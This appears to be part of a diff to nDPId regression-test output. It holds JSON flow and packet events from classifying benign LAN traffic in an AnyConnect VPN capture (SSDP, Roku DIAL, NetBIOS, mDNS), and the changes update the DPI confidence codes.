00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1569687269563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269563,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld56H0gqQcObfIBtdoAQEBWnIAAAAQEIChwN2AIAIeBI"} 
-00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269561,"flow_last_seen":1569687269563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":251,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1569687269563,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269561,"flow_last_seen":1569687269563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":251,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1569687269563,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1569687269567,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269567,"pkt":"NDY7z3Uo2DE0IHf7CABFAAA8AABAAEAGJUMKAACXCgAA4x983nsgu1W7gn2KRaASqbA3ZQAAAgQFtAQCCAoGktWOHA3YAQEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1569687269567,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269567,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl957H3yCfYpFILtVvIAQEBX\/yAAAAQEIChwN2AUGktWO"} -01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269562,"flow_last_seen":1569687269567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687269567,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.0.0.151","url":"10.0.0.151:8060\/dial\/dd.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; 
Intel Mac OS X 10_13_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/77.0.3865.90 Safari\/537.36"}} +01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269562,"flow_last_seen":1569687269567,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687269567,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.0.0.151","url":"10.0.0.151:8060\/dial\/dd.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/77.0.3865.90 Safari\/537.36"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1569687269598,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1569687269598,"pkt":"LH6BsEqhNDY7z3UoCABFAAAg\/t4AAEARZwsKAADjCgAAAc1zAMAADAmuEAEDEA=="} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687269716,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1569687269716,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687269716,"pkt":"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"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687269716,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687269716,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1569687270260,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1569687270260,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTj91AAEARlEMKAACXCgAA4wds4MsBP0SkSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="} 
00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1569687270560,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1569687270560,"pkt":"AQBef\/\/6NDY7z3UoCABFAADK9bsAAAERyIoKAADj7\/\/\/+uDLB2wAtl89TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS83Ny4wLjM4NjUuOTAgTWFjIE9TIFgNCg0K"} 00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1569687270729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1569687270729,"pkt":"NDY7z3Uo2DE0IHf7CABFAAFTkARAAEARlBwKAACXCgAA4wds4MsBP0SkSFRUUC8xLjEgMjAwIE9LDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDoyOTVjMDAwNC02ODA3LTEwNmQtODBjZi1kODMxMzQyMDc3ZmI6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KRXh0OiANClNlcnZlcjogUm9rdSBVUG5QLzEuMCBSb2t1LzkuMS4wDQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNTE6ODA2MC9kaWFsL2RkLnhtbA0KV0FLRVVQOiBNQUM9ZDg6MzE6MzQ6MjA6Nzc6ZmI7VGltZW91dD0xMA0KDQo="} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":822,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687270740,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1569687270740,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687270740,"pkt":"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"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687270740,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687270740,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1569687271101,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1569687271101,"pkt":"LH6BsEqhNDY7z3UoCABFAAAgLGIAAEAROYgKAADjCgAAAc1zAMAADBGuCAEDEA=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":885,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687271764,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1569687271764,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687271764,"pkt":"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"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":885,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687271764,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":885,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687271764,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1797,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687277139,"flow_last_seen":1569687277139,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569687277139,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1569687277139,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1569687277139,"pkt":"\/\/\/\/\/\/\/\/NDY7z3UoCABFAABgVbYAAEARDvYKAADjCgAA\/wCJAIkATLhJRX8wEAABAAAAAAABIEVNRkFDTkZDRUxFRkZDRkZGQ0NORVBGREZJQ0FDQUFBAAAgAAHADAAgAAEAAAAAAAZgAAoAAOM="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1797,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687277139,"flow_last_seen":1569687277139,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569687277139,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1797,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687277139,"flow_last_seen":1569687277139,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569687277139,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1569687277144,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1569687277144,"pkt":"\/\/\/\/\/\/\/\/NDY7z3UoCABFAABOK\/AAAEAROM4KAADjCgAA\/wCJAIkAOvmHRYABEAABAAAAAAAAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAAAgAAE="} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1569687277188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1569687277188,"pkt":"\/\/\/\/\/\/\/\/NDY7z3UoCABFAABgQ9oAAEARINIKAADjCgAA\/wCJAIkATMRRRYEwEAABAAAAAAABIEVNRkFDTkVDREFERUREREFERkREQ05GSERIREdERUFBAAAgAAHADAAgAAEAAAAAAAZgAAoAAOM="} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1569687281158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687281158,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0UBJAAPMGvOUIJWfECgAA4wG73ieGjW4CDCXQ8YARTdYkXAAAAQEICnincgAcDdF\/"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687286917,"flow_last_seen":1569687286917,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687286917,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1569687286917,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687286917,"pkt":"AQBeAAD7pHczjPFACABFAABEAABAAP8RkBgKAACV4AAA+xTpFOkAMI4UAAAAAAABAAAAAAAAC19nb29nbGV6b25lBF90Y3AFbG9jYWwAAAwAAQ=="} 
-00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687286917,"flow_last_seen":1569687286917,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687286917,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlezone._tcp.local"}} +00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687286917,"flow_last_seen":1569687286917,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687286917,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlezone._tcp.local"}} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2588,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1569687286918,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":1569687286918,"pkt":"AQBeAAD7pHczjPFACABFAABpAABAAP8Rj\/MKAACV4AAA+xTpFOkAVS3HAAAAAAABAAAAAAAAJDc5ZDg4ZTgzLTcyNWMtYjcxYi1iYWQwLTU4NjJkNWIyMjM4NgtfZ29vZ2xlem9uZQRfdGNwBWxvY2FsAAAhAAE="} 
-00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2588,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687286917,"flow_last_seen":1569687286918,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1569687286918,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"79d88e83-725c-b71b-bad0-5862d5b22386._googlezone._tcp.local"}} +00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2588,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687286917,"flow_last_seen":1569687286918,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1569687286918,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"79d88e83-725c-b71b-bad0-5862d5b22386._googlezone._tcp.local"}} 
00749{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2589,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1569687286918,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":1569687286918,"pkt":"AQBeAAD7pHczjPFACABFAAD+AABAAP8Rj14KAACV4AAA+xTpFOkA6vJcAACEAAAAAAEAAAADC19nb29nbGV6b25lBF90Y3AFbG9jYWwAAAwAAQAAAHgAJyQ3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODbADMAuABCAAQAAEZQAOCNpZD0yMERGOEZENkYzMTU5MUQyMDUwNEE5RkQ5OThDMzlFRRNfX2NvbW1vbl90aW1lX189MXwwwC4AIYABAAAAeAAtANIA8ycRJDc5ZDg4ZTgzLTcyNWMtYjcxYi1iYWQwLTU4NjJkNWIyMjM4NsAdwKsAAYABAAAAeAAECgAAlQ=="} -00699{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2589,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687286917,"flow_last_seen":1569687286918,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":343,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1569687286918,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlezone._tcp.local"}} 
